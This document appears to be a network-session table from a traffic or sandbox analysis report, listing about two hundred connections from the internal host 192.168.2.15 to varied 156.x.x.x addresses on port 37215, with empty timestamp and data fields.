                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23580192.168.2.1560902156.197.5.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23581192.168.2.1534476156.147.217.9437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23582192.168.2.1549884156.203.80.1237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23583192.168.2.1537040156.249.66.4437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23584192.168.2.1550092156.145.125.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23585192.168.2.1534694156.206.202.20237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23586192.168.2.1543150156.138.201.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23587192.168.2.1545980156.122.218.15937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23588192.168.2.1545240156.158.84.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23589192.168.2.1544416156.158.231.13837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23590192.168.2.1534692156.237.243.13337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23591192.168.2.1558742156.150.250.9337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23592192.168.2.1544294156.123.92.6837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23593192.168.2.1533036156.124.95.11037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23594192.168.2.1558654156.195.159.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23595192.168.2.1548888156.38.163.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23596192.168.2.1557992156.172.238.2537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23597192.168.2.1554144156.183.92.3037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23598192.168.2.1538130156.88.202.23237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23599192.168.2.1559514156.199.155.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23600192.168.2.1538722156.40.27.10737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23601192.168.2.1533916156.176.235.11137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23602192.168.2.1543378156.106.99.24437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23603192.168.2.1547180156.78.77.21637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23604192.168.2.1535940156.118.145.13737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23605192.168.2.1550560156.93.10.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23606192.168.2.1537158156.163.255.737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23607192.168.2.1560552156.166.160.4637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23608192.168.2.1559084156.114.153.6337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23609192.168.2.1552366156.160.137.2537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23610192.168.2.1543088156.236.186.13337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23611192.168.2.1544078156.40.251.24437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23612192.168.2.1540690156.30.231.3037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23613192.168.2.1555354156.118.91.4937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23614192.168.2.1534542156.10.109.15037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23615192.168.2.1550780156.217.95.837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23616192.168.2.1533604156.247.81.1537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23617192.168.2.1541788156.56.231.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23618192.168.2.1540202156.205.39.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23619192.168.2.1560640156.42.158.10237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23620192.168.2.1555354156.65.8.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23621192.168.2.1545826156.181.135.22737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23622192.168.2.1539224156.204.216.22537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23623192.168.2.1552344156.11.115.17737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23624192.168.2.1545528156.187.6.22237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23625192.168.2.1550566156.145.134.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23626192.168.2.1534864156.96.180.21037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23627192.168.2.1560418156.181.118.6237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23628192.168.2.1542162156.143.57.15137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23629192.168.2.1533528156.114.36.15137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23630192.168.2.1547082156.153.215.7937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23631192.168.2.1535572156.74.144.24037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23632192.168.2.1549644156.244.191.18937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23633192.168.2.1559348156.95.112.8637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23634192.168.2.1540184156.1.26.18037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23635192.168.2.1558386156.227.116.18637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23636192.168.2.1543468156.64.176.17637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23637192.168.2.1555530156.190.228.10537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23638192.168.2.1560266156.228.177.1237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23639192.168.2.1554456156.7.24.937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23640192.168.2.1560466156.129.2.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23641192.168.2.1552810156.133.161.17537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23642192.168.2.1538566156.141.174.20137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23643192.168.2.1559906156.203.67.1337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23644192.168.2.1551480156.193.29.22237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23645192.168.2.1551840156.115.19.10937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23646192.168.2.1537052156.97.235.7637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23647192.168.2.1535028156.222.123.3237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23648192.168.2.1540908156.115.166.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23649192.168.2.1552490156.253.198.9637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23650192.168.2.1553054156.215.206.837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23651192.168.2.1550788156.155.244.20037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23652192.168.2.1536954156.100.225.24637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23653192.168.2.1558228156.49.144.18737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23654192.168.2.1548430156.106.78.21437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23655192.168.2.1540050156.2.246.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23656192.168.2.1553910156.4.116.6637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23657192.168.2.1554570156.188.84.4337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23658192.168.2.1560754156.198.56.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23659192.168.2.1550850156.62.238.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23660192.168.2.1533588156.34.167.12437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23661192.168.2.1533992156.166.101.16237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23662192.168.2.1553254156.157.45.637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23663192.168.2.1541922156.8.217.3037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23664192.168.2.1533714156.12.52.12737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23665192.168.2.1552752156.62.67.25037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23666192.168.2.1555738156.192.71.11437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23667192.168.2.1544180156.200.161.16837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23668192.168.2.1555354156.215.201.18037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23669192.168.2.1554920156.70.91.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23670192.168.2.1554076156.91.136.5937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23671192.168.2.1546516156.180.13.637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23672192.168.2.1557046156.85.110.4437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23673192.168.2.1554030156.225.91.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23674192.168.2.1557836156.252.110.12037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23675192.168.2.1544138156.10.98.16337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23676192.168.2.1543972156.140.19.4737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23677192.168.2.1555372156.80.45.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23678192.168.2.1548032156.188.119.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23679192.168.2.1554536156.166.67.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23680192.168.2.1533628156.85.45.8237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23681192.168.2.1545606156.196.28.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23682192.168.2.1557046156.38.20.19737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23683192.168.2.1540240156.236.195.4137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23684192.168.2.1554946156.19.157.24037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23685192.168.2.1549384156.107.226.21537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23686192.168.2.1547004156.152.5.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23687192.168.2.1546460156.195.97.15037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23688192.168.2.1545270156.120.41.14337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23689192.168.2.1545132156.222.100.9137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23690192.168.2.1539208156.138.31.737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23691192.168.2.1550256156.106.88.8337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23692192.168.2.1554884156.195.137.16037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23693192.168.2.1559888156.44.46.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23694192.168.2.1543844156.93.238.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23695192.168.2.1537384156.140.237.22037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23696192.168.2.1536014156.5.69.14237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23697192.168.2.1556150156.53.132.13137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23698192.168.2.1555574156.10.218.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23699192.168.2.1537818156.220.51.5937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23700192.168.2.1549658156.93.81.9037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23701192.168.2.1535000156.15.226.20637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23702192.168.2.1543842156.179.163.20237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23703192.168.2.1552810156.140.1.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23704192.168.2.1557550156.123.216.15137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23705192.168.2.1556532156.11.25.1737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23706192.168.2.1547168156.77.199.10237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23707192.168.2.1542464156.87.195.1237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23708192.168.2.1554378156.150.112.5837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23709192.168.2.1539648156.10.58.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23710192.168.2.1538562156.228.120.2537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23711192.168.2.1537876156.52.41.6337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23712192.168.2.1537344156.124.94.10937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23713192.168.2.1536880156.246.138.24237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23714192.168.2.1544024156.145.156.19937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23715192.168.2.1543964156.97.114.20137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23716192.168.2.1550186156.158.94.10037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23717192.168.2.1549288156.162.99.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23718192.168.2.1546390156.219.8.2037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23719192.168.2.1544214156.150.147.12337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23720192.168.2.1555910156.55.108.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23721192.168.2.1553542156.195.155.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23722192.168.2.1555740156.33.35.1737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23723192.168.2.1549884156.84.35.8137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23724192.168.2.1535630156.140.14.14437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23725192.168.2.1534304156.209.1.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23726192.168.2.1541828156.36.233.17537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23727192.168.2.1544180156.92.16.11737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23728192.168.2.1557276156.212.247.14437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23729192.168.2.1545996156.35.182.5737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23730192.168.2.1545078156.189.98.10137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23731192.168.2.1548510156.115.74.4137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23732192.168.2.1534028156.70.60.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23733192.168.2.1555232156.112.10.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23734192.168.2.1558542156.98.95.537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23735192.168.2.1556246156.220.243.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23736192.168.2.1533206156.222.212.15437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23737192.168.2.1540558156.232.55.9337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23738192.168.2.1551132156.117.87.10537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23739192.168.2.1552874156.240.203.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23740192.168.2.1553700156.136.127.3737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23741192.168.2.1549370156.177.234.10137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23742192.168.2.1536510156.10.144.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23743192.168.2.1554408156.126.96.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23744192.168.2.1552288156.107.226.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23745192.168.2.1544736156.44.133.9637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23746192.168.2.1549942156.223.197.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23747192.168.2.1536484156.151.220.23637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23748192.168.2.1559108156.35.169.18137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23749192.168.2.1538086156.83.16.18437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23750192.168.2.1534042156.143.50.20037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23751192.168.2.1534444156.52.51.13737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23752192.168.2.1544630156.140.163.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23753192.168.2.1559478156.55.96.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23754192.168.2.1536018156.42.207.10337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23755192.168.2.1537444156.20.163.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23756192.168.2.1558246156.191.206.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23757192.168.2.1547956156.55.165.3837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23758192.168.2.1553816156.137.225.4337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23759192.168.2.1555806156.48.32.21637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23760192.168.2.1544612156.189.139.17537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23761192.168.2.1545076156.215.21.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23762192.168.2.1559712156.148.1.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23763192.168.2.1556694156.1.116.24237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23764192.168.2.1548678156.45.242.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23765192.168.2.1548876156.126.162.21037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23766192.168.2.1541378156.228.84.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23767192.168.2.1537200156.212.96.20937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23768192.168.2.1551208156.162.246.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23769192.168.2.1551056156.130.85.4037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23770192.168.2.1532862156.188.225.10137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23771192.168.2.1538718156.73.229.637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23772192.168.2.1550844156.115.102.3337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23773192.168.2.1538796156.255.180.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23774192.168.2.1542450156.3.34.2137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23775192.168.2.1545550156.118.65.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23776192.168.2.1540130156.18.248.1537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23777192.168.2.1556528156.224.65.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23778192.168.2.1536692156.69.109.16937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23779192.168.2.1555920156.44.116.11737215
                                                                            TimestampBytes transferredDirectionData


